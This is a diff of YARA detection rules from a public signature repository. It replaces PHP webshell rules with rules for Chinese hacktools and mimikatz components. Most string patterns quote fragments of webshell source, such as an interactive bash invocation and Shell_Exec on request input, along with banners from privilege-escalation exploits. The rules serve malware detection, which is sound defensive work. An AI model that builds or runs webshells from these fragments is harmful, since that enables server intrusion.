-		$s2 = "$dump = \"-- Database: \".$_POST['db'] .\" \\n\";" fullword
-		$s7 = "$aids = passthru(\"perl cbs.pl \".$_POST['connhost'].\" \".$_POST['connport']);" fullword
-		$s8 = "<b>IP:</b> <u>\" . $_SERVER['REMOTE_ADDR'] .\"</u> - Server IP:</b> <a href='htt"
-		$s14 = "$dump .= \"-- Cyber-Warrior.Org\\n\";" fullword
-		$s20 = "if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)" fullword
+		$s1 = "MYBLOG:HTTP://HI.BAIDU.COM/0X24Q" fullword ascii
+		$s2 = "\\Borland\\Delphi\\RTL" ascii
+		$s3 = "USER_NAME" ascii
+		$s4 = "FROMWWHERE" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Include_W_Shell
+rule SIGNATURE_BASE_Sqltools : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file php-include-w-shell.php"
+		description = "Chinese Hacktool Set - file SQLTools.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a80ca446-6612-51b4-99a7-8a8d8e6ee196"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6548-L6561"
+		id = "bddb7956-abc1-58b6-8a6d-eb482be99f42"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2167-L2186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1a7f4868691410830ad954360950e37c582b0292"
-		logic_hash = "2be144060d4fdaee38214dc2eba80c2a6fd3699060d274e66356fd5a08c9be4b"
+		hash = "38a9caa2079afa2c8d7327e7762f7ed9a69056f7"
+		logic_hash = "35b84c3445e92d61ca5e638a2eb19128dca2174327c6325436287d8d3f0bb976"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s13 = "# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!" fullword
-		$s17 = "\"phpshellapp\" => \"export TERM=xterm; bash -i\"," fullword
-		$s19 = "else if($numhosts == 1) $strOutput .= \"On 1 host..\\n\";" fullword
+		$s1 = "DBN_POST" fullword wide
+		$s2 = "LOADER ERROR" fullword ascii
+		$s3 = "www.1285.net" fullword wide
+		$s4 = "TUPFILEFORM" fullword wide
+		$s5 = "DBN_DELETE" fullword wide
+		$s6 = "DBINSERT" fullword wide
+		$s7 = "Copyright (C) Kibosoft Corp. 2001-2006" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2350KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Mysql_Tool
+rule SIGNATURE_BASE_HKTL_Portscanner_533_NET_Jun15 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file mysql_tool.php"
+		description = "Chinese Hacktool Set - file portscanner.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a22a0a5c-a686-517e-b1f9-279edab0616b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6562-L6574"
+		id = "c834203d-6d4d-5242-9b1e-b64fa6560ccd"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		old_rule_name = "portscanner"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2188-L2205"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c9cf8cafcd4e65d1b57fdee5eef98f0f2de74474"
-		logic_hash = "611636b3fa9a3163574b18cf8eacebea9733a1ad381261387f79a532b003e8fd"
+		hash = "1de367d503fdaaeee30e8ad7c100dd1e320858a4"
+		logic_hash = "446cbc1b8046bfd182e0b1c98fe37c8b8ef98f600f5d80d9de83b45aeaf2b386"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s12 = "$dump .= \"-- Dumping data for table '$table'\\n\";" fullword
-		$s20 = "$dump .= \"CREATE TABLE $table (\\n\";" fullword
+		$s0 = "PortListfNo" fullword ascii
+		$s1 = ".533.net" fullword ascii
+		$s2 = "CRTDLL.DLL" fullword ascii
+		$s3 = "exitfc" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Phpspy_Ver_2006
+rule SIGNATURE_BASE_Kappfree : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file PhpSpy Ver 2006.php"
+		description = "Chinese Hacktool Set - file kappfree.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "adbb1963-31c8-5540-a679-c75b1101c163"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6575-L6589"
+		id = "eb9c1324-5d82-57ab-bd48-98c984b45b32"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2207-L2222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "34a89e0ab896c3518d9a474b71ee636ca595625d"
-		logic_hash = "69bd2c387b0e676168116f3b3c3c081e08fd555cc6bc9a94b9c8ef97f194b09f"
+		hash = "e57e79f190f8a24ca911e6c7e008743480c08553"
+		logic_hash = "b1b644f9b033ac8372369e81628ee3f6fe094f80d11b8f4f6c192a5e81d2e543"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "var_dump(@$shell->RegRead($_POST['readregname']));" fullword
-		$s12 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
-		$s19 = "$program = isset($_POST['program']) ? $_POST['program'] : \"c:\\winnt\\system32"
-		$s20 = "$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\\winnt\\backdoor.exe'"
+		$s1 = "Bienvenue dans un processus distant" fullword wide
+		$s2 = "kappfree.dll" fullword ascii
+		$s3 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Zyklonshell
+rule SIGNATURE_BASE_Smartniff : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file ZyklonShell.php"
+		description = "Chinese Hacktool Set - file Smartniff.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4d7ff3e5-4940-52c8-b045-5db1523f70c2"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6590-L6604"
+		id = "3d169126-1b43-5545-a106-7c38a6a49499"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2224-L2239"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3fa7e6f3566427196ac47551392e2386a038d61c"
-		logic_hash = "5d49f2599781836156f6bbb0c50cfcffdb2ca51c7cb688abbc6245d7f856ad01"
+		hash = "67609f21d54a57955d8fe6d48bc471f328748d0a"
+		logic_hash = "bac770ae3c8e7f619da0b0ff4243716ff8212dce0f36c08c127af892548fe0b6"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>" fullword
-		$s1 = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" fullword
-		$s2 = "<TITLE>404 Not Found</TITLE>" fullword
-		$s3 = "<H1>Not Found</H1>" fullword
+		$s1 = "smsniff.exe" fullword wide
+		$s2 = "support@nirsoft.net0" fullword ascii
+		$s3 = "</requestedPrivileges></security></trustInfo></assembly>" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Myshell_2
+rule SIGNATURE_BASE_Chinachopper_Caidao : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file myshell.php"
+		description = "Chinese Hacktool Set - file caidao.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		old_rule_name = "WebShell_php_webshells_myshell"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6605-L6620"
+		id = "c56eb3e5-e916-535b-bf87-88a9ae94c359"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2241-L2259"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5bd52749872d1083e7be076a5e65ffcde210e524"
-		logic_hash = "7765e43189d6ec0cda0b58d00cfd7fc8cec89287dbac7487083b6ce1ce55f306"
+		hash = "056a60ec1f6a8959bfc43254d97527b003ae5edb"
+		logic_hash = "7e16a452c98e36a4946bcede5552bef7f6fc82314b28b506307cf010a0890ea6"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if($ok==false &&$status && $autoErrorTrap)system($command . \" 1> /tmp/outpu"
-		$s5 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
-		$s15 = "<title>$MyShellVersion - Access Denied</title>" fullword
-		$s16 = "}$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTT"
+		$s1 = "Pass,Config,n{)" fullword ascii
+		$s2 = "phMYSQLZ" fullword ascii
+		$s3 = "\\DHLP\\." ascii
+		$s4 = "\\dhlp\\." ascii
+		$s5 = "SHAutoComple" fullword ascii
+		$s6 = "MainFrame" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1077KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Lolipop
+rule SIGNATURE_BASE_Kiwitaskmgr_2 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file lolipop.php"
+		description = "Chinese Hacktool Set - file KiwiTaskmgr.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6621-L6634"
+		id = "ea021257-8ced-5131-a00a-be014b4112fb"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2261-L2276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "86f23baabb90c93465e6851e40104ded5a5164cb"
-		logic_hash = "8b0dcf76a244f80d4bee0c62189df55c1f8d71cf0900cd8ebb5916f5fe972bed"
+		hash = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
+		logic_hash = "6d197e9b7bb9bbd759d6c8c882f7d7412512ba10208cb52a08fcde5e32fd1733"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "$commander = $_POST['commander']; " fullword
-		$s9 = "$sourcego = $_POST['sourcego']; " fullword
-		$s20 = "$result = mysql_query($loli12) or die (mysql_error()); " fullword
+		$s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
+		$s2 = "Kiwi Taskmgr no-gpo" fullword wide
+		$s3 = "KiwiAndTaskMgr" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Simple_Cmd
+rule SIGNATURE_BASE_Kappfree_2 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file simple_cmd.php"
+		description = "Chinese Hacktool Set - file kappfree.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1fd0c01a-c265-5e30-ab36-e8e93e316fbe"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6635-L6649"
+		id = "6c7b4a99-b5ab-5fd6-b130-7c30b84b7171"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2278-L2294"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "466a8caf03cdebe07aa16ad490e54744f82e32c2"
-		logic_hash = "82a65f4bbdcd2fc626aa9f36fe530d19aa19a48389e970c26e525597818914ee"
+		hash = "5d578df9a71670aa832d1cd63379e6162564fb6b"
+		logic_hash = "1862f1283e8a268f523b3922b3630ebbca9a81cc5aed19e5068315e6346d25c2"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
-		$s2 = "<title>G-Security Webshell</title>" fullword
-		$s4 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
-		$s6 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+		$s1 = "kappfree.dll" fullword ascii
+		$s2 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide
+		$s3 = "' introuvable !" fullword wide
+		$s4 = "kiwi\\mimikatz" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Go_Shell
+rule SIGNATURE_BASE_X_Way2_5_Sqlcmd : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file go-shell.php"
+		description = "Chinese Hacktool Set - file sqlcmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "63eaf530-050a-5db7-8885-d4a1e86d62de"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6650-L6665"
+		id = "c6b4dae2-38cb-5cf9-b980-df5ebefbe7ad"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2296-L2324"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3dd85981bec33de42c04c53d081c230b5fc0e94f"
-		logic_hash = "f2fcefb9a0536c80fa74ceb002e113f95de53d1f56e22c81b542c395dd11071d"
+		hash = "5152a57e3638418b0d97a42db1c0fc2f893a2794"
+		logic_hash = "59fd25a786d56885e456fca154800a8313cd04a23fd9374361cc37b86be109a1"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "#change this password; for power security - delete this file =)" fullword
-		$s2 = "if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};" fullword
-		$s11 = "open(FILEHANDLE, \"cd $param{dir}&&$param{cmd}|\");" fullword
-		$s12 = "print << \"[kalabanga]\";" fullword
-		$s13 = "<title>GO.cgi</title>" fullword
+		$s1 = "LOADER ERROR" fullword ascii
+		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s3 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+		$s4 = "kernel32.dll" fullword ascii
+		$s5 = "VirtualAlloc" fullword ascii
+		$s6 = "VirtualFree" fullword ascii
+		$s7 = "VirtualProtect" fullword ascii
+		$s8 = "ExitProcess" fullword ascii
+		$s9 = "user32.dll" fullword ascii
+		$s16 = "MessageBoxA" fullword ascii
+		$s10 = "wsprintfA" fullword ascii
+		$s11 = "kernel32.dll" fullword ascii
+		$s12 = "GetProcAddress" fullword ascii
+		$s13 = "GetModuleHandleA" fullword ascii
+		$s14 = "LoadLibraryA" fullword ascii
+		$s15 = "odbc32.dll" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 23KB and filesize > 20KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Azrailphp_V1_0_2
+rule SIGNATURE_BASE_Win32_Klock : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file aZRaiLPhp v1.0.php"
+		description = "Chinese Hacktool Set - file klock.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "10546549-e16d-567d-9d88-3d37fe8ff03f"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		old_rule_name = "WebShell_aZRaiLPhp_v1_0"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6666-L6681"
+		id = "dd17a8e2-54af-5967-937a-d83feceab891"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2326-L2341"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a2c609d1a8c8ba3d706d1d70bef69e63f239782b"
-		logic_hash = "8309338bb327cc14ae5970bd921b3dba68353d55be31b9dbbc5374ded24ed563"
+		hash = "7addce4434670927c4efaa560524680ba2871d17"
+		logic_hash = "e9f1d38de15ce06d55cf276e0f2becd9f9dbf5bd22f9061de03761d7ccdd3e60"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED"
-		$s4 = "$fileperm=base_convert($_POST['fileperm'],8,10);" fullword
-		$s19 = "touch (\"$path/$dismi\") or die(\"Dosya Olu" fullword
-		$s20 = "echo \"<div align=left><a href='./$this_file?dir=$path/$file'>G" fullword
+		$s1 = "klock.dll" fullword ascii
+		$s2 = "Erreur : impossible de basculer le bureau ; SwitchDesktop : " fullword wide
+		$s3 = "klock de mimikatz pour Windows" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_Zehir4
+rule SIGNATURE_BASE_Ipsearcher : FILE
 {
 	meta:
-		description = "Webshells Github Archive - file zehir4"
+		description = "Chinese Hacktool Set - file ipsearcher.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6682-L6695"
+		id = "bb33535a-e8cc-545d-bee8-3c31902eedb9"
+		date = "2015-06-13"
+		modified = "2022-12-21"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2343-L2360"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "788928ae87551f286d189e163e55410acbb90a64"
-		logic_hash = "36b6940ffecd9be190cce62252ec7d87f1c0bc0d19b4442df63f4404eb316364"
-		score = 55
-		quality = 85
-		tags = ""
+		hash = "1e96e9c5c56fcbea94d26ce0b3f1548b224a4791"
+		logic_hash = "e63349ede826bc7b0e9c94d122e5b294c11a598fcf7096b80be726146e796a80"
+		score = 75
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "frames.byZehir.document.execCommand(command, false, option);" fullword
-		$s8 = "response.Write \"<title>ZehirIV --> Powered By Zehir &lt;zehirhacker@hotmail.com"
+		$s0 = "http://www.wzpg.com" fullword ascii
+		$s1 = "ipsearcher\\ipsearcher\\Release\\ipsearcher.pdb" ascii
+		$s3 = "_GetAddress" fullword ascii
+		$s5 = "ipsearcher.dll" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 140KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Zehir4_Asp_Php
+rule SIGNATURE_BASE_Ms10048_X64 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file zehir4.asp.php.txt"
+		description = "Chinese Hacktool Set - file ms10048-x64.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7a849bc6-fff5-5bb6-aff7-660889fd077b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6696-L6709"
+		id = "8c9bcf72-1bc7-57ed-9e0b-09d113a8c704"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2362-L2378"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1d9b78b5b14b821139541cc0deb4cbbd994ce157"
-		logic_hash = "dfaf685ac3b364143bfbe289b05f066b09f01622fec3e9157f4b4791f7567619"
+		hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
+		logic_hash = "f6e353a9e4f751632ca5fda1663f0ba66b16b60df90570ccdaf836eaaa6a78ca"
 		score = 75
-		quality = 60
-		tags = ""
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "response.Write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&"
-		$s11 = "frames.byZehir.document.execCommand("
-		$s15 = "frames.byZehir.document.execCommand(co"
+		$s1 = "The target is most likely patched." fullword ascii
+		$s2 = "Dojibiron by Ronald Huizer, (c) master#h4cker.us  " fullword ascii
+		$s3 = "[ ] Creating evil window" fullword ascii
+		$s4 = "[+] Set to %d exploit half succeeded" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and 1 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Lostdc
+rule SIGNATURE_BASE_Hscangui : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file lostDC.php"
+		description = "Chinese Hacktool Set - file hscangui.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6710-L6725"
+		id = "f0993510-70ee-52c6-a7b8-e023eb4b33ee"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2380-L2396"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d54fe07ea53a8929620c50e3a3f8fb69fdeb1cde"
-		logic_hash = "e3cd28f4a72f5a8a92c728fe76a7159c28256e87daf4c1dd10190a57263f5b45"
+		hash = "af8aced0a78e1181f4c307c78402481a589f8d07"
+		logic_hash = "9c0eb87dcf8aa107b5289d196650aebcf49c24f57a317de0afdadd61fb5bb5b7"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';" fullword
-		$s4 = "header ( \"Content-Description: Download manager\" );" fullword
-		$s5 = "print \"<center>[ Generation time: \".round(getTime()-startTime,4).\" second"
-		$s9 = "if (mkdir($_POST['dir'], 0777) == false) {" fullword
-		$s12 = "$ret = shellexec($command);" fullword
+		$s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii
+		$s2 = "http://www.cnhonker.com" fullword ascii
+		$s3 = "%s@ftpscan#Cracked account:  %s/%s" fullword ascii
+		$s4 = "[%s]: Found \"FTP account: %s/%s\" !!!" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Casus_1_5
+rule SIGNATURE_BASE_Goodtoolset_Ms11080 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file CasuS 1.5.php"
+		description = "Chinese Hacktool Set - file ms11080.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cf89d8f8-d498-57fe-98eb-a98350db182f"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6726-L6739"
+		id = "080e04a3-5cbe-57a8-9106-539451922cb4"
+		date = "2015-06-13"
+		modified = "2022-12-21"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2398-L2417"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7eee8882ad9b940407acc0146db018c302696341"
-		logic_hash = "0dbaa39bd33047d24e5bc9716108c5581da3f54e93d90f9c550b3d84de1ebfe2"
+		hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"
+		logic_hash = "a5b03dded6146dae48bca962e7c5419c2ea69f8709ae7f2c9355bd178d5d77fb"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO"
-		$s8 = "$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");" fullword
-		$s18 = "if (file_exists(\"F:\\\\\")){" fullword
+		$s1 = "[*] command add user 90sec 90sec" fullword ascii
+		$s2 = "\\ms11080\\Debug\\ms11080.pdb" ascii
+		$s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
+		$s4 = "[*] Add to Administrators success" fullword ascii
